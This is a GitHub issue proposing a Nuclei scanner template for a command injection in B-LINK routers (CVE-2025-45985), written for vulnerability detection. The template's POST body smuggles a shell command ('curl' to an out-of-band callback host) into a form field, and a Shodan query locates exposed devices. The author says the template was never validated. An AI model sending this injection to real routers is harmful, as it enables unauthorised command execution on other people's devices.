### ISSUE TITLE
[TEMPLATE CONTRIBUTION] CVE-2025-45985 - Blink Routers Command Injection via bs_SetSSIDHide

### ISSUE THREAD

**Issue by darses** [projectdiscovery/nuclei-templates#12345]
### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: cve-2025-45985

info:
  name: Blink Routers Command Injection via bs_SetSSIDHide
  author: darses
  severity: critical
  description: |
    This template checks for a command injection vulnerability in the `/goform/set_hidessid_cfg` endpoint of Blink routers by exploiting the `bs_SetSSIDHide` function.
  tags: oast
  metadata:
    shodan-query:
      - title:"B-LINK" product:"GoAhead Embedded Web Server"
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-45985
    - https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_enable%20Unauthorized%20command%20injection/LB-LINK_enable%20command%20injection.md

http:
  - method: POST
    path:
      - "{{BaseURL}}/goform/set_hidessid_cfg"

    body: |
      type=sethide2&enable=";curl {{interactsh-url}};"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '{"type":"sethide2","result":0}'

      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
```

### Relevant dumped responses

```shell

```

### Anything else?

I did not validate the template as I do not have a D-Link Router. The check is based on the publicly available research, and modified to add an OAST check.
